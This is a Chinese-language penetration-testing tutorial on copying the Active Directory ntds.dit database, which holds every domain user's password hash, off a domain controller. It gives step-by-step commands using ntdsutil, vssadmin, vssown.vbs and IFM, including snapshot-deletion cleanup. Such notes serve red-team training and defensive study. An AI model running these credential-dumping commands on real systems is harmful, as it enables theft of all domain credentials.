ntdsutils.exe提取ntds.dit
vssadmin提取ntds.dit
vssown提取ntds.dit
IFM
ntds.dit:
ntds.dit为AD的数据库,内容有域用户、域组、用户hash等信息,域控上的ntds.dit只有可以登录到域控的用户(如域管用户、DC本地管理员用户)可以访问。ntds.dit包括三个主要表:数据表、链接表、sd表。所以只要在域渗透中能够获取到ntds.dit就可以获取到所有域用户的用户名和对应的hash,它和SAM文件一样,被windows系统锁死
多种方式提取和移动ntds.dit文件
ntdsutils.exe提取ntds.dit:
系统自带工具ntdsutils.exe 是一个为活动目录提供管理机制的命令行工具,使用 ntdsutils.exe 可以维护和管理活动目录数据库、控制单个主机操作、创建应用程序目录分区等,该工具默认安装在域控服务器上,可以在域控制器上直接操作,支持windows server 2003、2008、2012。提取过程分为3步
第一步:创建快照:
ntdsutil.exe snapshot "activate instance ntds" create q q
可以看到快照的uid
第二步:加载快照:
ntdsutil.exe snapshot "mount {bda4374b-380d-4900-ad63-a23d40a71413}" q q
可以看到快照地址
第三步:复制快照中的ntds.dit文件
copy '快照地址\Windows\NTDS\ntds.dit' 目标地址
第四步:删除快照
ntdsutil.exe snapshot "umount {bda4374b-380d-4900-ad63-a23d40a71413}" "delete {bda4374b-380d-4900-ad63-a23d40a71413}" q q
vssadmin提取ntds.dit:
vssadmin1是Windows Server 2008及Windows 7系统提供的VSS管理工具,它可以用于创建或删除卷影副本,列出卷影副本的信息(只能管理系统Provider创建的卷影副本)。还可以用于显示所有安装的所有卷影副本写入程序(writers)和提供程序(providers),以及改变卷影副本存储空间(即所谓的“diff空间”)的大小等。支持的操作系统:Server 2008、Server 2012
第一步:创建快照:
vssadmin create shadow /for=c:
第二步:复制文件:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\windows\NTDS\ntds.dit C:\Users\Administrator\Desktop\ntds\ntds.dit
第三步:删除快照:
vssadmin delete shadows /for=c: /quiet
vssown提取ntds.dit
vssown.vbs和vssadmin类似,它是由Tim Tomes开发完成的,它可以创建和删除卷影副本,以及启动和停止卷影复制服务
第一步:启动卷影复制服务:
cscript vssown.vbs /start
第二步:创建一个C盘的卷影副本
cscript vssown.vbs /create c
第三步:列出当前卷影副本
cscript vssown.vbs /list
第四步:复制文件
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\windows\NTDS\ntds.dit
C:\Users\Administrator\Desktop\ntds\ntds.dit
第五步:删除卷影副本
cscript vssown.vbs /delete {B2B8CFA7-1BE5-4800-9F22-DD127282D904}
IFM:
可以通过创建一个 IFM 的方式获取 ntds.dit,在使用 ntdsutil 创建媒体安装集(IFM)时,需要进行生成快照、加载、将 ntds.dit 和计算机的 SAM 文件复制到目标文件夹中等操作,这些操作也可以通过PowerShell 或 VMI 远程执行。
第一步:
ntdsutil "ac i ntds" "ifm" "create full c:/test" q q
第二步:删除
rmdir /s/q C:\test
